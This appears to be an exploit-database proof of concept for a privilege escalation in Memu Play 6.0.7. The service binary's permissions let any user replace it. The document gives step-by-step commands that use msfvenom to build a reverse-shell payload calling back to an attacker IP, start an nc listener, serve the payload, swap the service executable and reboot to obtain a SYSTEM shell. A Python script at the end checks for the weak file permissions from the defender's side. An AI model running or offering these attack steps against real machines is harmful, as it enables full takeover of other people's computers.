[EXP]Memu Play 6.0.7 - Privilege Escalation
# Exploit Title: Memu Play 6.0.7 - Privilege Escalation (PoC)
# Date: //
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.memuplay.com/
# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Version: 6.0.7
# Tested on: Windows / Windows

# Description:
# Memu Play 6.0.7 suffers from Privilege Escalation due to insecure file permissions

# Prerequisites
# Local, low privilege access with restart capabilities

# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
# it with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed files; Failed processing files

C:\>sc qc MEmuSVC
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC
TYPE : WIN32_OWN_PROCESS
START_TYPE : AUTO_START
ERROR_CONTROL : NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
LOAD_ORDER_GROUP :
TAG :

# Proof of Concept

1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe

2. Setup listener and ensure apache is running on attacking machine
nc -lvp
service apache2 start

3. Download malicious .exe on victim machine
Open browser to http://192.168.1.130/MemuService.exe and download

4. Overwrite file and copy malicious .exe.
Rename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

5. Restart victim machine

6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
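
A defender-side check for the condition shown in the icacls output above, added here as an example and not part of the original advisory: it parses icacls output and reports ACEs that let a low-privilege principal replace a service binary. The function name `weak_aces`, the list of low-privilege principals and the hardened sample are assumptions made for illustration.

```python
import re

# Principals that every local low-privilege account belongs to (assumed list).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow overwriting, renaming/deleting or re-ACLing a file.
REPLACE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DE", "WDAC", "WO", "GW", "GA"}
ACE_RE = re.compile(r"^(?P<who>[^()]+?):(?P<groups>(?:\([^)]*\))+)$")


def weak_aces(path, icacls_output):
    """Return [(principal, [rights])] for low-privilege ACEs that permit replacing `path`."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        # The first ACE shares its line with the file path; drop the path.
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # status lines such as "Successfully processed ..."
        tokens = {t.strip().upper()
                  for group in re.findall(r"\(([^)]*)\)", m["groups"])
                  for t in group.split(",")}
        if "DENY" in tokens:
            continue  # a deny ACE removes access rather than granting it
        risky = sorted(tokens & REPLACE_RIGHTS)
        if m["who"].lower() in LOW_PRIV and risky:
            findings.append((m["who"], risky))
    return findings


SERVICE_BINARY = r"C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
# ACEs as listed in the advisory's icacls output.
ADVISORY_OUTPUT = r"""
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
"""
# Constructed sample: ACL of a locked-down service binary.
HARDENED_OUTPUT = r"""
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(RX)
"""

if __name__ == "__main__":
    for who, rights in weak_aces(SERVICE_BINARY, ADVISORY_OUTPUT):
        print(f"{SERVICE_BINARY}: {who} holds {','.join(rights)}")
```

Run the same check against the containing folder's ACL as well, since delete or write rights on the directory also allow the rename-and-replace step.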